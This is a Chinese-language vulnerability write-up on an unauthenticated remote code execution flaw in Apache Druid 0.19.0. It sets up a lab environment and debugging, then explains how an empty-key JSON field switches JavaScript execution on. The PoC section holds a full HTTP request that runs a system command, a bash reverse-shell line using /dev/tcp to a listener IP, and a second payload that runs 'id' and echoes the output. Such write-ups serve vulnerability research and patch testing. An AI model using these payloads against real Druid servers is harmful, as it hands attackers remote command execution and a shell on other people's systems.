漏洞描述
虽然官方描述是需要登录,但是这个认证机制默认并没有开启,所以相当于是默认情况下的RCE。
环境搭建
wget https://mirrors.bfsu.edu.cn/apache/druid/0.19.0/apache-druid-0.19.0-bin.tar.gz
tar zxf apache-druid-0.19.0-bin.tar.gz
cd apache-druid-0.19.0
bin/start-micro-quickstart
# 停止直接CTRL+C即可
修改端口在:
conf/druid/single-server/micro-quickstart/router/runtime.properties
将默认的8888改为其他端口。
启动这个micro的时候默认会在2181启动zookeeper,修改配置:
vi conf/zk/zoo.cfg
如果其他应用占用了2181端口,而你将这个druid自带的zookeeper变成了其他端口,则需要在启动之前添加一个变量:
export DRUID_SKIP_PORT_CHECK=1
还有其他组件由于被占用了默认端口,导致退出了,修改默认端口:
[cqq@localhost micro-quickstart]$ grep -rn "druid.plaintextPort" *
broker/runtime.properties:21:druid.plaintextPort=8082
coordinator-overlord/runtime.properties:21:druid.plaintextPort=8081
historical/runtime.properties:21:druid.plaintextPort=8083
middleManager/runtime.properties:21:druid.plaintextPort=8091
router/runtime.properties:21:druid.plaintextPort=8889
[cqq@localhost micro-quickstart]$ pwd
/home/cqq/repos/apache-druid-0.19.0/conf/druid/single-server/micro-quickstart
修改端口之前,其他组件启动失败,打开界面为:
成功启动其他组件之后,
端口监听情况:
界面情况:
调试配置:
vi apache-druid-0.19.0/conf/druid/single-server/micro-quickstart/coordinator-overlord/jvm.config
在最后一行添加:
-Xrunjdwp:transport=dt_socket,suspend=n,server=y,address=12346
分析
默认情况下执行用户提供的js代码是禁止的:
这里利用
"": {"enabled": true}
将JavaScriptConfig对象的enable属性值设置为true,覆盖系统默认的false,开启了js执行功能。
然后就是js调Java代码的流程了。
PoC
POST /druid/indexer/v1/sampler HTTP/1.1
Host: 192.168.85.130:8888
Content-Type: application/json;charset=utf-8
Content-Length: 587
Connection: close
{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"timestamp\":\"2020-12-12T12:10:21.040Z\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "test", "function": "function(value) {java.lang.Runtime.getRuntime().exec('calc')}", "": {"enabled": true}}}}}}
反弹shell改成:
/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.85.1/7777 0>&1
回显:
{
"type": "index",
"spec": {
"ioConfig": {
"type": "index",
"firehose": {
"type": "local",
"baseDir": "/etc",
"filter": "passwd"
}
},
"dataSchema": {
"dataSource": "%%DATASOURCE%%",
"parser": {
"parseSpec": {
"format": "javascript",
"timestampSpec": {},
"dimensionsSpec": {},
"function": "function(){var s = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"2013-09-01T12:41:27Z\",test: s}}",
"": {
"enabled": "true"
}
}
}
}
}
}
参考
- https://mp.weixin.qq.com/s/McAoLfyf_tgFIfGTAoRCiw
- https://seclists.org/oss-sec/2021/q1/87
- https://druid.apache.org/docs/latest/tutorials/index.html
- https://github.com/apache/druid/issues/2434
- https://druid.apache.org/docs/latest/operations/api-reference.html#broker